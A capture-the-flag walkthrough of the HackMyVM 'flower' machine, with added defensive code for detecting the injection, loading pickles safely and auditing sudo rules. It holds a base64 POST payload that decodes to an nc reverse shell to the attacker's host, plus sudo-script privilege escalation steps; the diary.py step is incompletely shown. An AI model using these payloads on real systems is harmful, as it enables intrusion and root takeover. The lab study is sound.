HackMyVM: flower machine detailed walkthrough (WP)
城南花已开

Information gathering

Service probing

👌 A port scan shows that only port 80 is open, running an HTTP service.

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:20:e1:73 (Unknown)
192.168.56.107 08:00:27:38:65:68 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.887 seconds (135.67 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.107

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 07:23 EST
Nmap scan report for 192.168.56.107
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:38:65:68 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 192.168.56.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.83 seconds

The page looks like this, with nothing of value on it. A directory scan only turned up a pile of Apache documentation, lol 🤣

When we pick a flower type and submit, the page shows how many petals it has. Let's capture the request with Burp Suite.

I chose Lily here. The submit sends a POST request carrying a base64-encoded number, which is evaluated server-side and displayed on the page.

HackBar is more convenient here; let's try system(ls); to list the files in the current directory.

That works, so we can send a reverse shell straight back to Kali.

Change the body to petals=c3lzdGVtKCJuYyAtYyBzaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Iik7 and the shell comes back.
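The petals parameter is only ever a base64-wrapped petal count, so a request whose decoded value is anything else is exactly the injection performed above. The following detection routine is an added example, not code from the original post or from the flower machine; the request bodies are constructed to match the POST shape described above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Constructed request bodies shaped like the flower page's POST. The first is
# a normal submission (base64 of "6"); the second wraps system("ls"); the
# way the write-up does through HackBar; the third is not base64 at all.
SAMPLE_BODIES = [
    "petals=Ng==",
    "petals=c3lzdGVtKCJscyIpOw==",
    "petals=not%20base64%21",
]

# A petal count is a short decimal integer and nothing else.
PETAL_COUNT_RE = re.compile(rb"^[0-9]{1,3}$")


def classify_petals(body: str) -> tuple:
    """Return ("ok", count) for a genuine petal count, else ("suspicious", why).

    The server decodes and evaluates whatever sits inside the base64, so the
    only safe value is a bare number; a decoded value containing anything
    else is code being smuggled through the wrapper.
    """
    values = parse_qs(body, keep_blank_values=True).get("petals", [])
    if len(values) != 1:
        return ("suspicious", "petals parameter missing or repeated")
    try:
        decoded = base64.b64decode(values[0], validate=True)
    except (binascii.Error, ValueError):
        return ("suspicious", "petals is not valid base64")
    if PETAL_COUNT_RE.match(decoded):
        return ("ok", decoded.decode("ascii"))
    return ("suspicious", f"decoded payload is not a number: {decoded[:40]!r}")


def suspicious_bodies(bodies: list) -> list:
    """Filter captured bodies down to the ones worth alerting on."""
    return [b for b in bodies if classify_petals(b)[0] == "suspicious"]


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", classify_petals(body))
```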

User privilege escalation

After setting up a stable interactive terminal, look around for useful information.

There is a Python script in the user's home directory.

www-data@flower:/home$ cd rose/
www-data@flower:/home/rose$ ls
diary user.txt
www-data@flower:/home/rose$ ls -la
total 32
drwxrwxr-x 3 rose rose 4096 Nov 30 2020 .
drwxr-xr-x 3 root root 4096 Nov 30 2020 ..
-rw-r--r-- 1 rose rose 220 Nov 30 2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30 2020 .bashrc
-rwx------ 1 rose rose 120 Nov 30 2020 .plantbook
-rw-r--r-- 1 rose rose 807 Nov 30 2020 .profile
drwxrwxrwx 2 rose rose 4096 Nov 30 2020 diary ## permissions are 777
-rw------- 1 rose rose 20 Nov 30 2020 user.txt
www-data@flower:/home/rose$ cd diary/
www-data@flower:/home/rose/diary$ ls
diary.py
www-data@flower:/home/rose/diary$ cat diary.py
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)

Looking at the Python script on its own shows that it is a pickle deserialization.

import pickle

# Open the file for reading binary data
with open('diary.pickle', 'rb') as p:
    # Deserialize the file contents into a dict
    loaded_diary = pickle.load(p)

# Print the loaded dict
print(loaded_diary)

Since this script deserializes, we could create a serialized diary.pickle file of our own for it to deserialize.
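Added example, not the box's diary.py: what a loader for diary.pickle looks like when it refuses to resolve any global, so a planted pickle cannot turn pickle.load into code execution. A plain dict of strings is built from opcodes alone and needs no globals, so the genuine diary still loads. Both sample streams are constructed here; the rejected one references datetime.date, a harmless stand-in for whatever a malicious stream would name.

```python
import datetime
import io
import pickle

# The same dict diary.py on the box writes to diary.pickle (constructed here).
DIARY = {"November28": "i found a blue viola", "December1": "i lost my blue viola"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global.

    pickle.load() resolves every module.name the stream names and may call
    it with stream-supplied arguments, so a diary.pickle anyone can write is
    a code-execution sink. A dict of strings is built from opcodes alone and
    never needs a global, so rejecting all of them loses nothing.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_diary(data: bytes) -> dict:
    """Deserialise diary.pickle contents, enforcing the expected shape."""
    obj = RestrictedUnpickler(io.BytesIO(data)).load()
    if not isinstance(obj, dict) or not all(
        isinstance(k, str) and isinstance(v, str) for k, v in obj.items()
    ):
        raise ValueError("diary must map str -> str")
    return obj


def is_accepted(data: bytes) -> bool:
    try:
        load_diary(data)
        return True
    except (pickle.UnpicklingError, ValueError):
        return False


# Constructed streams: the benign diary, and one that makes the unpickler
# look up a global (datetime.date, harmless here, but the same mechanism a
# planted pickle relies on).
GOOD_STREAM = pickle.dumps(DIARY)
BAD_STREAM = pickle.dumps({"November28": datetime.date(2020, 11, 28)})

if __name__ == "__main__":
    print(load_diary(GOOD_STREAM))
    print("rejected:", not is_accepted(BAD_STREAM))
```

Replacing pickle with json for a str-to-str diary removes the global-lookup problem entirely; the restricted unpickler is the fix when the format cannot change.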

We also find that www-data has a sudo rule: it can run /usr/bin/python3 /home/rose/diary/diary.py as rose.

www-data@flower:/home/rose/diary$ sudo -l
Matching Defaults entries for www-data on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
(rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py

Looking back, the diary directory has 777 permissions, so I can simply delete diary.py and create a new one. Done.

Instant win 😋

www-data@flower:/home/rose/diary$ ls
diary.pickle diary.py
www-data@flower:/home/rose/diary$ rm diary.py
rm: remove write-protected regular file 'diary.py'? y
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$ cd ~
rose@flower:~$ ls
diary user.txt
rose@flower:~$ cat user.txt
HMV{R0ses_are_R3d$}

Root privilege escalation

User rose also has a sudo rule.

rose@flower:~$ sudo -l
Matching Defaults entries for rose on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rose may run the following commands on flower:
(root) NOPASSWD: /bin/bash /home/rose/.plantbook
rose@flower:~$ cat .plantbook
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)

We have read, write and execute permissions on .plantbook, so just modify it.
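Both sudo rules on this box share one flaw: the script the rule points at lives in a path the invoking user can modify (diary.py sits in a 777 directory, .plantbook is owned by rose). The audit routine below is an added example, not part of the write-up; the rule lines are copied from the sudo -l output above, the metadata for the /home/rose entries comes from the ls -la listings, and the modes of /usr/bin/python3 and /bin/bash are assumed.

```python
import re

# Rule lines exactly as sudo -l printed them in the write-up, paired with
# the user who ran sudo -l (www-data first, rose second).
SUDO_RULES = [
    ("www-data", "(rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py"),
    ("rose", "(root) NOPASSWD: /bin/bash /home/rose/.plantbook"),
]

# (owner, mode) per path: /home/rose entries come from the ls -la listings
# above; the two interpreter paths are assumed root-owned 0755.
FS = {
    "/home/rose": ("rose", 0o775),
    "/home/rose/diary": ("rose", 0o777),
    "/home/rose/diary/diary.py": ("rose", 0o644),
    "/home/rose/.plantbook": ("rose", 0o700),
    "/usr/bin/python3": ("root", 0o755),
    "/bin/bash": ("root", 0o755),
}

# "(runas) TAG: TAG: /cmd args" -> runas user and the command string.
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?:[A-Z]+:\s*)*(?P<cmd>/.*)$")


def writable_by(user: str, path: str, fs: dict) -> bool:
    """True if user can edit path, or unlink and recreate it because its
    directory is writable. Group bits ignored; unknown paths root 0755."""
    owner, mode = fs.get(path, ("root", 0o755))
    if (owner == user and mode & 0o200) or mode & 0o002:
        return True
    parent = path.rsplit("/", 1)[0] or "/"
    powner, pmode = fs.get(parent, ("root", 0o755))
    if powner == user and pmode & 0o200:
        return True
    # World-writable directory without the sticky bit: anyone can replace
    # entries, which is exactly how diary.py was swapped out above.
    return bool(pmode & 0o002) and not pmode & 0o1000


def audit(rules, fs) -> list:
    """(user, runas, path) for every rule whose command or argument path
    the invoking user can tamper with before sudo runs it."""
    findings = []
    for user, line in rules:
        m = RULE_RE.match(line.strip())
        if m is None:
            continue
        for arg in m.group("cmd").split():
            if arg.startswith("/") and writable_by(user, arg, fs):
                findings.append((user, m.group("runas"), arg))
    return findings
```

The fix is the same for both rules: the script must be root-owned, not writable by the invoking user, and live in a directory with the same properties.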

rose@flower:~$ ls -al
total 36
drwxrwxr-x 3 rose rose 4096 Nov 26 08:07 .
drwxr-xr-x 3 root root 4096 Nov 30 2020 ..
-rw------- 1 rose rose 28 Nov 26 08:07 .bash_history
-rw-r--r-- 1 rose rose 220 Nov 30 2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30 2020 .bashrc
-rwx------ 1 rose rose 120 Nov 30 2020 .plantbook
-rw-r--r-- 1 rose rose 807 Nov 30 2020 .profile
drwxrwxrwx 2 rose rose 4096 Nov 26 08:06 diary
-rw------- 1 rose rose 20 Nov 30 2020 user.txt
rose@flower:~$ echo -n "bash -p ">.plantbook
rose@flower:~$ sudo /bin/bash /home/rose/.plantbook
root@flower:/home/rose# ls
diary user.txt
root@flower:/home/rose# cd ~
root@flower:~# ls
root.txt
root@flower:~# cat root.txt
HMV{R0ses_are_als0_black.}

This machine is very easy; it's instant-noodle level 🐔.
